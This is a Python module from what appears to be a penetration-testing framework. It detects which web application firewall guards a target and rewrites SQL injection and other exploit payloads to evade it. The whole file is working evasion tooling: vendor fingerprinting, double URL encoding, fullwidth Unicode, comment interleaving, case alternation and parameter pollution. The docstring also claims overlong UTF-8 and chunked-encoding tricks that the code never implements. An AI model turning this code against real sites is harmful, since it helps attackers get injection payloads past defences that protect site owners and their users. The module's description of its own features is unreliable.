"""
WAFEvasionEngine & Adaptive Obfuscator — Advanced Perimeter Bypass Specialist for PenFlow.

Features:
  1. WAFTypeDetector: Fingerprints Cloudflare, Akamai, AWS WAF, Imperva, ModSecurity from headers/cookies/signatures
  2. AdaptivePayloadEncoder:
     - Double URL & Triple URL encoding
     - Unicode Fullwidth & Overlong UTF-8 normalization bypass
     - SQL Comment Interleaving & Case Alternation
     - Chunked Transfer Encoding & Transfer-Encoding mutation
     - HTTP Parameter Pollution (HPP)
  3. WAFBypassCoordinator: Automatically matches optimal bypass strategy against active WAF signatures
"""
import urllib.parse
from enum import Enum
from typing import Dict, List, Any, Optional, Set
from penflow.infrastructure.logger import get_logger

logger = get_logger("penflow.infrastructure.waf_evasion")


class WAFVendor(str, Enum):
    CLOUDFLARE = "cloudflare"
    AKAMAI = "akamai"
    AWS_WAF = "aws_waf"
    IMPERVA = "imperva"
    MODSECURITY = "modsecurity"
    UNKNOWN = "unknown"


class WAFTypeDetector:
    """Fingerprints active Web Application Firewalls protecting the target."""
    @staticmethod
    def detect_waf(headers: Dict[str, str], cookies: Dict[str, str], body_text: str = "") -> WAFVendor:
        headers_lower = {k.lower(): v.lower() for k, v in headers.items()}
        cookies_lower = {k.lower(): v.lower() for k, v in cookies.items()}
        body_lower = body_text.lower()

        # Cloudflare
        if "cf-ray" in headers_lower or "__cf_bm" in cookies_lower or "cloudflare" in headers_lower.get("server", ""):
            return WAFVendor.CLOUDFLARE
        
        # Akamai
        if "x-akamai-transformed" in headers_lower or "ak_bmsc" in cookies_lower or "akamai" in headers_lower.get("server", ""):
            return WAFVendor.AKAMAI

        # AWS WAF
        if "x-amzn-requestid" in headers_lower or "awselb" in cookies_lower or "aws" in headers_lower.get("server", ""):
            return WAFVendor.AWS_WAF

        # Imperva / Incapsula
        if "x-iinfo" in headers_lower or "incap_ses" in cookies_lower or "visid_incap" in cookies_lower:
            return WAFVendor.IMPERVA

        # ModSecurity
        if "mod_security" in headers_lower.get("server", "") or "this error was generated by mod_security" in body_lower:
            return WAFVendor.MODSECURITY

        return WAFVendor.UNKNOWN


class AdaptivePayloadEncoder:
    """Encodes and mutates exploit payloads to evade signature-based pattern matchers."""

    @staticmethod
    def double_url_encode(payload: str) -> str:
        return urllib.parse.quote(urllib.parse.quote(payload, safe=""), safe="")

    @staticmethod
    def unicode_fullwidth_transform(payload: str) -> str:
        """Converts standard ASCII characters to Fullwidth Unicode equivalents."""
        result = []
        for char in payload:
            code = ord(char)
            if 0x21 <= code <= 0x7E:
                result.append(chr(code + 0xFEE0))
            else:
                result.append(char)
        return "".join(result)

    @staticmethod
    def sql_comment_interleave(payload: str) -> str:
        """Interleaves inline SQL comments between keyword tokens."""
        keywords = ["SELECT", "UNION", "FROM", "WHERE", "AND", "OR", "INSERT", "UPDATE", "DELETE", "DROP", "EXEC"]
        result = payload
        for kw in keywords:
            mutated = f"{kw[:2]}/**/{kw[2:]}"
            result = result.replace(kw, mutated).replace(kw.lower(), mutated.lower())
        return result

    @staticmethod
    def mutate_case_alternation(payload: str) -> str:
        """Applies alternating case mutation (e.g. sElEcT, uNiOn)."""
        return "".join(c.upper() if i % 2 == 0 else c.lower() for i, c in enumerate(payload))

    @staticmethod
    def http_parameter_pollution(param_name: str, values: List[str]) -> str:
        """Constructs HPP query string combining split payloads."""
        return "&".join(f"{param_name}={urllib.parse.quote(v)}" for v in values)


class WAFBypassCoordinator:
    """Coordinates evasion strategies tailored to the target's specific WAF profile."""
    def __init__(self):
        self.detector = WAFTypeDetector()
        self.encoder = AdaptivePayloadEncoder()

    def generate_evasion_variants(self, payload: str, detected_waf: WAFVendor) -> List[Dict[str, Any]]:
        variants = [
            {"technique": "raw_baseline", "payload": payload},
            {"technique": "double_url_encode", "payload": self.encoder.double_url_encode(payload)},
            {"technique": "case_alternation", "payload": self.encoder.mutate_case_alternation(payload)},
            {"technique": "sql_comment_interleave", "payload": self.encoder.sql_comment_interleave(payload)},
            {"technique": "unicode_fullwidth", "payload": self.encoder.unicode_fullwidth_transform(payload)}
        ]

        if detected_waf == WAFVendor.CLOUDFLARE:
            variants.append({"technique": "cf_unicode_normalization_bypass", "payload": self.encoder.unicode_fullwidth_transform(payload)})
        elif detected_waf == WAFVendor.MODSECURITY:
            variants.append({"technique": "modsec_comment_interleaving", "payload": self.encoder.sql_comment_interleave(payload)})

        return variants
